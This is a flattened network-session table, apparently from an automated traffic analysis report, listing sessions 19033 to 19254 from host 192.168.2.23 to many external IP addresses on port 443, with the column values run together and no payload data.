                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19033192.168.2.233938035.139.53.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19034192.168.2.2360460107.49.74.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19035192.168.2.235220496.243.224.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19036192.168.2.2349144190.4.136.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19037192.168.2.2359014167.149.189.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19038192.168.2.2347988176.74.167.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19039192.168.2.235835858.185.249.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19040192.168.2.2333908123.88.169.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19041192.168.2.234502848.197.101.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19042192.168.2.234299890.119.234.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19043192.168.2.233528470.161.166.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19044192.168.2.2339962149.180.60.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19045192.168.2.235442883.246.179.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19046192.168.2.2356688217.245.118.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19047192.168.2.233616299.173.65.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19048192.168.2.23563482.216.42.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19049192.168.2.2338670206.97.127.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19050192.168.2.23424569.153.168.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19051192.168.2.23402749.64.234.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19052192.168.2.233326457.236.179.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19053192.168.2.235125881.58.48.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19054192.168.2.2348604172.133.197.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19055192.168.2.235330875.69.228.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19056192.168.2.234246284.170.187.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19057192.168.2.234288690.19.213.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19058192.168.2.234882850.14.84.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19059192.168.2.235957450.90.232.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19060192.168.2.2334052184.230.26.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19061192.168.2.2333766105.151.95.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19062192.168.2.2338392196.66.133.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19063192.168.2.2359318166.167.249.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19064192.168.2.234439265.4.35.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19065192.168.2.2355694130.66.154.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19066192.168.2.235658650.100.192.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19067192.168.2.234615274.216.98.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19068192.168.2.2343222203.29.203.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19069192.168.2.2359776211.166.234.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19070192.168.2.2343568193.23.228.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19071192.168.2.2338586116.112.56.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19072192.168.2.2347174174.235.74.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19073192.168.2.2336942126.117.73.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19074192.168.2.233289881.231.44.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19075192.168.2.234612264.185.160.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19076192.168.2.2336938172.155.216.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19077192.168.2.2335988116.29.23.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19078192.168.2.2344388174.71.147.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19079192.168.2.2352520119.36.223.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19080192.168.2.2335384116.26.67.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19081192.168.2.235048234.244.197.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19082192.168.2.234918458.184.55.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19083192.168.2.2351872123.51.72.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19084192.168.2.233991473.71.140.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19085192.168.2.2346700133.248.156.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19086192.168.2.2345542151.125.44.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19087192.168.2.235114687.71.4.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19088192.168.2.2349128164.60.203.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19089192.168.2.235185250.136.132.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19090192.168.2.234418035.129.18.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19091192.168.2.2356914209.211.22.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19092192.168.2.234089879.183.30.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19093192.168.2.2340664182.7.175.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19094192.168.2.2346332108.125.214.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19095192.168.2.2355628160.165.183.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19096192.168.2.2355878136.73.181.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19097192.168.2.2333236108.110.103.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19098192.168.2.2333394162.88.198.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19099192.168.2.2352158201.71.145.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19100192.168.2.2334288115.78.249.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19101192.168.2.236044014.212.252.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19102192.168.2.2354398201.9.28.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19103192.168.2.233304087.235.107.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19104192.168.2.234457853.102.252.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19105192.168.2.23438425.32.93.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19106192.168.2.2359806117.220.32.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19107192.168.2.2360672133.173.249.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19108192.168.2.2351876118.79.221.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19109192.168.2.2354542158.212.178.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19110192.168.2.233536072.89.129.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19111192.168.2.235194675.26.221.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19112192.168.2.234007286.211.149.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19113192.168.2.2352666142.210.200.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19114192.168.2.2348674197.227.56.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19115192.168.2.2355548216.231.142.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19116192.168.2.233903861.19.209.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19117192.168.2.233862046.201.185.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19118192.168.2.234926041.123.176.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19119192.168.2.233947458.42.164.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19120192.168.2.2341808110.56.20.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19121192.168.2.2335974207.227.13.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19122192.168.2.2346302144.154.50.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19123192.168.2.234948273.69.166.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19124192.168.2.234287299.194.136.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19125192.168.2.2349408171.6.183.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19126192.168.2.235389691.183.71.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19127192.168.2.23335141.169.150.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19128192.168.2.2344664112.97.70.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19129192.168.2.233605018.83.95.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19130192.168.2.234974296.132.17.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19131192.168.2.2340238200.195.48.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19132192.168.2.2345410139.199.202.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19133192.168.2.235679273.223.232.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19134192.168.2.235942239.102.220.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19135192.168.2.235117437.226.65.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19136192.168.2.234372252.196.70.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19137192.168.2.23592941.10.96.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19138192.168.2.2338254181.27.82.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19139192.168.2.235278041.103.21.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19140192.168.2.2341572103.129.231.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19141192.168.2.2339150204.251.129.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19142192.168.2.2358734104.43.164.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19143192.168.2.2333120183.232.26.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19144192.168.2.2349580148.123.228.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19145192.168.2.2348964185.3.215.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19146192.168.2.2360888206.41.91.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19147192.168.2.2359718122.140.198.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19148192.168.2.2355168159.34.31.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19149192.168.2.2345024150.119.12.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19150192.168.2.2333548107.60.140.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19151192.168.2.2333878101.11.23.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19152192.168.2.2343438125.77.152.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19153192.168.2.2342978152.33.23.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19154192.168.2.2348306104.170.97.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19155192.168.2.2359578131.35.77.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19156192.168.2.235019820.233.226.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19157192.168.2.235867672.145.179.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19158192.168.2.2336174119.66.82.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19159192.168.2.233374485.91.57.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19160192.168.2.2337204211.72.207.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19161192.168.2.234428070.135.126.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19162192.168.2.233642078.209.31.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19163192.168.2.2352046173.8.91.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19164192.168.2.2336262204.177.61.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19165192.168.2.233956290.71.24.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19166192.168.2.2337246206.228.127.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19167192.168.2.2340938197.96.201.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19168192.168.2.2335406125.175.95.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19169192.168.2.235381214.243.238.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19170192.168.2.2354396102.130.24.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19171192.168.2.2334970191.208.100.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19172192.168.2.2342518140.237.32.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19173192.168.2.2333260187.233.225.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19174192.168.2.235580662.168.19.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19175192.168.2.2349838152.232.38.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19176192.168.2.234065861.245.216.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19177192.168.2.233591442.127.116.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19178192.168.2.235053450.79.252.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19179192.168.2.23581905.131.204.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19180192.168.2.233993043.237.85.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19181192.168.2.234525448.30.6.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19182192.168.2.235999471.89.97.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19183192.168.2.234579899.175.210.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19184192.168.2.235887613.123.249.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19185192.168.2.234894673.49.153.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19186192.168.2.2346812151.158.33.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19187192.168.2.233915043.239.161.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19188192.168.2.234970879.44.12.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19189192.168.2.2359760175.247.189.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19190192.168.2.233449053.98.52.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19191192.168.2.235015260.148.40.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192192.168.2.2340376109.188.76.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19193192.168.2.2335746218.23.206.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19194192.168.2.2334206175.101.166.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19195192.168.2.2347968134.151.161.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19196192.168.2.2356116101.18.166.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19197192.168.2.2343886136.72.185.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19198192.168.2.234166862.104.43.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19199192.168.2.2336034128.109.160.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19200192.168.2.234761854.50.158.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19201192.168.2.2336214222.241.162.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19202192.168.2.2357952129.90.170.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19203192.168.2.235010088.128.253.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19204192.168.2.235337272.73.26.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19205192.168.2.2355380111.97.239.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19206192.168.2.2359508120.248.176.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19207192.168.2.234116837.190.46.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19208192.168.2.2348118124.133.188.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19209192.168.2.233330288.163.172.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19210192.168.2.234988096.184.29.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19211192.168.2.234171885.132.177.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19212192.168.2.2360612146.183.59.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19213192.168.2.235617660.14.198.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19214192.168.2.235391018.89.107.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19215192.168.2.2333726119.191.104.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19216192.168.2.235856488.84.174.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19217192.168.2.2350420145.226.103.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19218192.168.2.2337438175.138.192.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19219192.168.2.2350388109.174.0.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19220192.168.2.2354402157.255.29.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19221192.168.2.233315042.184.121.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19222192.168.2.233703084.26.96.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19223192.168.2.2358892158.213.220.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19224192.168.2.234075280.0.86.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19225192.168.2.2360990117.207.3.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19226192.168.2.235444249.185.73.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19227192.168.2.233504254.157.91.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19228192.168.2.2355374184.121.155.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19229192.168.2.2344532185.57.71.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19230192.168.2.2355490133.105.203.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19231192.168.2.235657264.190.68.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19232192.168.2.2344462135.111.78.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19233192.168.2.2335818148.84.238.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19234192.168.2.2334554106.138.168.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19235192.168.2.2355882201.122.251.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19236192.168.2.2341092129.135.146.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19237192.168.2.234973288.95.53.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19238192.168.2.2344550217.153.208.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19239192.168.2.2336568106.74.44.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19240192.168.2.2335928134.5.218.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19241192.168.2.235969664.29.219.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19242192.168.2.2351446219.96.135.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19243192.168.2.2336614209.131.16.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19244192.168.2.2359784223.58.102.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19245192.168.2.2332918165.92.97.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19246192.168.2.2336632110.225.69.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19247192.168.2.2354124106.201.64.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19248192.168.2.2335238110.37.3.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19249192.168.2.234176612.18.52.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19250192.168.2.236015819.161.70.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19251192.168.2.2348274184.79.103.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19252192.168.2.233966647.14.217.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19253192.168.2.235810267.108.127.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19254192.168.2.2343172193.226.86.82443
